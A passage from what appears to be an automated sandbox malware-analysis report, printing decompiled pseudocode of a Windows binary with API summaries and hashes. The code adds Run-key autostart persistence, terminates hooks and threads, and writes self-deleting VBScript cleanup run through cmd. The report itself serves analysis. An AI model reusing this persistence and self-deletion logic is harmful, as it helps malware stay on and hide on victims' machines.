                                  				_t116 = E0040B692(0x80000001,  &_v608, "exepath",  &_v608, 0x208, _t114, _t114);
                                  				_t299 = _t297 + 0x28;
                                  				if(_t116 == 0) {
                                  					_t116 = GetModuleFileNameW(0,  &_v608, 0x208);
                                  				}
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				RegDeleteKeyA(0x80000001, _t116);
                                  				_t174 = __imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
                                  				_v5 = 1;
                                  				_t118 =  *_t174(0x41bc68, 0x415800);
                                  				if(_t118 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					SetFileAttributesW(_t118, 0x80);
                                  				}
                                  				_t120 = SetFileAttributesW( &_v608, 0x80);
                                  				if(_t120 == 0) {
                                  					_v5 = _v5 & _t120;
                                  				}
                                  				_t121 =  &_v6;
                                  				__imp___wgetenv(L"Temp", _t121, L"\\uninstall.vbs");
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t121);
                                  				L00414146();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t121);
                                  				_t123 =  &_v6;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t123);
                                  				L0041416A();
                                  				_t301 = _t299 + 0x18;
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v24, L"On Error Resume Next\n", _t123);
                                  				if(_v5 != 0) {
                                  					_t165 =  &_v608;
                                  					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t165,  &_v6, L"\")\n");
                                  					_t166 =  &_v72;
                                  					L0041416A();
                                  					_t167 =  &_v40;
                                  					L00414146();
                                  					_t301 = _t301 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t167, _t167, _t166, _t166, L"while fso.FileExists(\"", _t165);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				_t126 =  &_v6;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t126,  &_v608, L"\"\n");
                                  				_t127 =  &_v72;
                                  				L00414146();
                                  				_t128 =  &_v56;
                                  				L00414146();
                                  				_t303 = _t301 + 0x18;
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t128, _t128, _t127, _t127, _t126);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				if(_v5 != 0) {
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                  				}
                                  				_push(0x415800);
                                  				_push(0x41bc68);
                                  				if( *_t174() != 0) {
                                  					_t163 =  &_v72;
                                  					L0041416A();
                                  					_t129 =  &_v56;
                                  					L00414146();
                                  					_t303 = _t303 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t129, _t129, _t163, _t163, L"fso.DeleteFolder \"", 0x41bc68, L"\"\n");
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t131 = E00412D56( &_v24, _t129 << 1, _t129 << 1, _t129, 0);
                                  				_t304 = _t303 + 0x10;
                                  				if(_t131 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					ShellExecuteW(0, L"open", _t131, 0x415800, 0x415800, 0);
                                  				}
                                  				exit(0);
                                  				_pop(_t280);
                                  				_pop(_t291);
                                  				_pop(_t175);
                                  				_t305 = _t304 - 0x27c;
                                  				_t132 = E0040AC8C();
                                  				if( *0x41b154 != 0x30) {
                                  					_t132 = E00406D41(0x41b900);
                                  				}
                                  				if( *0x41c118 == 1) {
                                  					_t132 = E0041050F(_t132);
                                  				}
                                  				if( *0x41b22a != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t132 = E00412BEE(_t132);
                                  				}
                                  				_t176 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                  				if( *0x41ba58 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t132 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t132);
                                  					_t305 = _t305 + 0xc;
                                  				}
                                  				if( *0x41bc64 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t132 = E0040B9E8(0x80000002, _t176, _t132);
                                  					_t305 = _t305 + 0xc;
                                  				}
                                  				if( *0x41ba20 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t132 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t132);
                                  					_t305 = _t305 + 0xc;
                                  				}
                                  				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t134 = E0040B692(0x80000001,  &_v644, "exepath",  &_v644, 0x208, _t132, _t132);
                                  				_t306 = _t305 + 0x1c;
                                  				if(_t134 == 0) {
                                  					_t134 = GetModuleFileNameW(0,  &_v644, 0x208);
                                  				}
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				RegDeleteKeyA(0x80000001, _t134);
                                  				_v9 = 1;
                                  				_t137 = SetFileAttributesW( &_v644, 0x80);
                                  				if(_t137 == 0) {
                                  					_v9 = _v9 & _t137;
                                  				}
                                  				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                  				if(_t137 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					SetFileAttributesW(_t137, 0x80);
                                  				}
                                  				_t138 =  &_v10;
                                  				__imp___wgetenv(L"Temp", _t138, L"\\update.vbs");
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t138);
                                  				L00414146();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v92, _t138);
                                  				_t140 =  &_v10;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t140);
                                  				L0041416A();
                                  				_t308 = _t306 + 0x18;
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v44, L"On Error Resume Next\n", _t140);
                                  				if(_v9 != 0) {
                                  					_t157 =  &_v644;
                                  					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t157,  &_v10, L"\")\n");
                                  					_t158 =  &_v76;
                                  					L0041416A();
                                  					_t159 =  &_v28;
                                  					L00414146();
                                  					_t308 = _t308 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t159, _t159, _t158, _t158, L"while fso.FileExists(\"", _t157);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				_t285 = L"\"\n";
                                  				_t143 =  &_v10;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t143,  &_v644, _t285);
                                  				_t144 =  &_v76;
                                  				L00414146();
                                  				_t145 =  &_v60;
                                  				L00414146();
                                  				_t310 = _t308 + 0x18;
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t145, _t145, _t144, _t144, _t143);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				if(_v9 != 0) {
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                  				}
                                  				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                  				if(_t145 != 0) {
                                  					_t154 =  &_v76;
                                  					L0041416A();
                                  					_t155 =  &_v60;
                                  					L00414146();
                                  					_t310 = _t310 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t155, _t155, _t154, _t154, L"fso.DeleteFolder \"", 0x41bc68, _t285);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				_t146 =  &_v10;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t146, "\n");
                                  				_t148 =  &_v9;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t148,  &_v0, _t146);
                                  				_t149 =  &_v28;
                                  				L0041414C();
                                  				_t150 =  &_v76;
                                  				L0041414C();
                                  				_t151 =  &_v60;
                                  				L00414146();
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t151, _t151, _t150, _t150, _t149, _t149, _t148);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t153 = E00412D56( &_v44, _t151 << 1, _t151 << 1, _t151, 0);
                                  				if(_t153 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t153 = ShellExecuteW(0, L"open", _t153, 0x415800, 0x415800, 0);
                                  					if(_t153 > 0x20) {
                                  						exit(0);
                                  					}
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t153;
                                  			}

                                  0x0040824e
                                  0x0040825a
                                  0x00408261
                                  0x00408261
                                  0x0040826d
                                  0x0040826f
                                  0x0040826f
                                  0x0040827b
                                  0x00408282
                                  0x00408289
                                  0x0040828e
                                  0x0040829e
                                  0x004082a8
                                  0x004082ac
                                  0x004082b5
                                  0x004082ba
                                  0x004082ba
                                  0x004082c4
                                  0x004082c8
                                  0x004082d5
                                  0x004082da
                                  0x004082da
                                  0x004082e4
                                  0x004082e8
                                  0x004082f9
                                  0x004082fe
                                  0x004082fe
                                  0x00408301
                                  0x00408316
                                  0x00408318
                                  0x00408321
                                  0x0040832a
                                  0x0040834a
                                  0x00408352
                                  0x00408357
                                  0x0040835c
                                  0x00408368
                                  0x00408368
                                  0x00408370
                                  0x00408378
                                  0x0040837e
                                  0x00408390
                                  0x00408394
                                  0x0040839a
                                  0x004083a6
                                  0x004083ad
                                  0x004083ad
                                  0x004083bf
                                  0x004083c7
                                  0x004083c9
                                  0x004083c9
                                  0x004083cc
                                  0x004083da
                                  0x004083e5
                                  0x004083f0
                                  0x004083fb
                                  0x00408401
                                  0x0040840d
                                  0x0040841d
                                  0x00408422
                                  0x00408428
                                  0x00408432
                                  0x0040843d
                                  0x00408447
                                  0x0040844e
                                  0x00408457
                                  0x00408460
                                  0x00408464
                                  0x00408469
                                  0x00408470
                                  0x00408479
                                  0x00408482
                                  0x0040848b
                                  0x0040848b
                                  0x0040849d
                                  0x004084a9
                                  0x004084b0
                                  0x004084b4
                                  0x004084bd
                                  0x004084c1
                                  0x004084c6
                                  0x004084cd
                                  0x004084d6
                                  0x004084df
                                  0x004084e8
                                  0x004084f2
                                  0x004084fc
                                  0x004084fc
                                  0x00408502
                                  0x00408503
                                  0x0040850a
                                  0x00408512
                                  0x0040851b
                                  0x00408524
                                  0x00408528
                                  0x0040852d
                                  0x00408534
                                  0x0040853d
                                  0x00408546
                                  0x00408546
                                  0x00408554
                                  0x00408560
                                  0x0040856a
                                  0x00408576
                                  0x0040857d
                                  0x00408582
                                  0x00408587
                                  0x0040858f
                                  0x0040859c
                                  0x0040859c
                                  0x004085a3
                                  0x004085a9
                                  0x004085aa
                                  0x004085ab
                                  0x004085af
                                  0x004085b5
                                  0x004085c1
                                  0x004085c8
                                  0x004085c8
                                  0x004085d4
                                  0x004085d6
                                  0x004085d6
                                  0x004085e2
                                  0x004085e9
                                  0x004085f0
                                  0x004085f5
                                  0x00408605
                                  0x0040860f
                                  0x00408613
                                  0x0040861c
                                  0x00408621
                                  0x00408621
                                  0x0040862b
                                  0x0040862f
                                  0x0040863c
                                  0x00408641
                                  0x00408641
                                  0x0040864b
                                  0x0040864f
                                  0x00408660
                                  0x00408665
                                  0x00408665
                                  0x0040866f
                                  0x00408678
                                  0x00408698
                                  0x004086a0
                                  0x004086a5
                                  0x004086aa
                                  0x004086b6
                                  0x004086b6
                                  0x004086be
                                  0x004086c6
                                  0x004086df
                                  0x004086e3
                                  0x004086e7
                                  0x004086e9
                                  0x004086e9
                                  0x004086f7
                                  0x00408701
                                  0x00408709
                                  0x00408710
                                  0x00408710
                                  0x00408712
                                  0x00408720
                                  0x0040872b
                                  0x00408736
                                  0x00408741
                                  0x00408747
                                  0x00408753
                                  0x00408763
                                  0x00408768
                                  0x0040876e
                                  0x00408778
                                  0x00408783
                                  0x0040878d
                                  0x00408794
                                  0x0040879d
                                  0x004087a6
                                  0x004087aa
                                  0x004087af
                                  0x004087b6
                                  0x004087bf
                                  0x004087c8
                                  0x004087d1
                                  0x004087d1
                                  0x004087d7
                                  0x004087e4
                                  0x004087f0
                                  0x004087f7
                                  0x004087fb
                                  0x00408804
                                  0x00408808
                                  0x0040880d
                                  0x00408814
                                  0x0040881d
                                  0x00408826
                                  0x0040882f
                                  0x00408839
                                  0x00408843
                                  0x00408843
                                  0x00408850
                                  0x0040885a
                                  0x0040885e
                                  0x00408867
                                  0x00408870
                                  0x00408874
                                  0x00408879
                                  0x00408880
                                  0x00408889
                                  0x00408892
                                  0x00408892
                                  0x00408898
                                  0x004088a9
                                  0x004088b4
                                  0x004088c0
                                  0x004088c7
                                  0x004088cb
                                  0x004088d4
                                  0x004088d8
                                  0x004088e1
                                  0x004088e5
                                  0x004088f1
                                  0x004088fa
                                  0x00408903
                                  0x0040890c
                                  0x00408915
                                  0x0040891e
                                  0x0040892c
                                  0x00408938
                                  0x00408942
                                  0x0040894e
                                  0x00408955
                                  0x0040895f
                                  0x00408967
                                  0x00408974
                                  0x0040897d
                                  0x00408980
                                  0x00408980
                                  0x0040897d
                                  0x00408989
                                  0x00408992
                                  0x0040899b
                                  0x004089a5

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00408282
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082AC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082C8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082E8
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 00408321
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040832A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000208,00000000), ref: 0040834A
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408368
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00408370
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408378
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408394
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004083A6
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 004083AD
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 004083BF
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                    • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                  • _wgetenv.MSVCRT ref: 004083DA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004083E5
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004083F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083FB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 0040840D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 0040841D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408428
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00408447
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00408457
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408464
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408470
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408479
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408482
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040848B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004084A9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084B4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084C1
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004084CD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084D6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084DF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084E8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 004084FC
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408504
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 0040851B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408528
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408534
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 0040853D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408546
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00408554
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408560
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040856A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408576
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040858F
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040859C
                                  • exit.MSVCRT ref: 004085A3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@G@2@@0@V?$basic_string@$Hstd@@$V01@V10@Y?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@FileG@1@@$TerminateV01@@V10@@$??9std@@AttributesThread$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                  • String ID: ")$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\uninstall.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 4026913539-546584676
                                  • Opcode ID: 9bc248cd9fe04f0f2b4b3d098964f51d31cdf6e9861adf38e66a57827838d369
                                  • Instruction ID: 4759749fa9a93480e8798f104ff06792d31013b0e42c9834499dc68fb1b0d0e4
                                  • Opcode Fuzzy Hash: 9bc248cd9fe04f0f2b4b3d098964f51d31cdf6e9861adf38e66a57827838d369
                                  • Instruction Fuzzy Hash: FA917172900509BBDB00EBE0ED4DAEE777CEF94305F14806AF902A2191DF795E44CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E0040FA46(void* __eflags, intOrPtr _a4, signed int _a8, char _a11, signed int _a12) {
                                  				struct HDC__* _v8;
                                  				void* _v12;
                                  				struct HDC__* _v16;
                                  				int _v20;
                                  				int _v24;
                                  				int _v28;
                                  				char _v44;
                                  				intOrPtr _v50;
                                  				void* _v52;
                                  				void* _v54;
                                  				intOrPtr _v58;
                                  				char _v60;
                                  				char _v76;
                                  				intOrPtr _v80;
                                  				struct tagCURSORINFO _v96;
                                  				signed int _v102;
                                  				signed int _v104;
                                  				long _v112;
                                  				long _v116;
                                  				char _v120;
                                  				struct _ICONINFO _v140;
                                  				int _t143;
                                  				void* _t144;
                                  				signed int _t153;
                                  				long _t164;
                                  				void* _t165;
                                  				char* _t189;
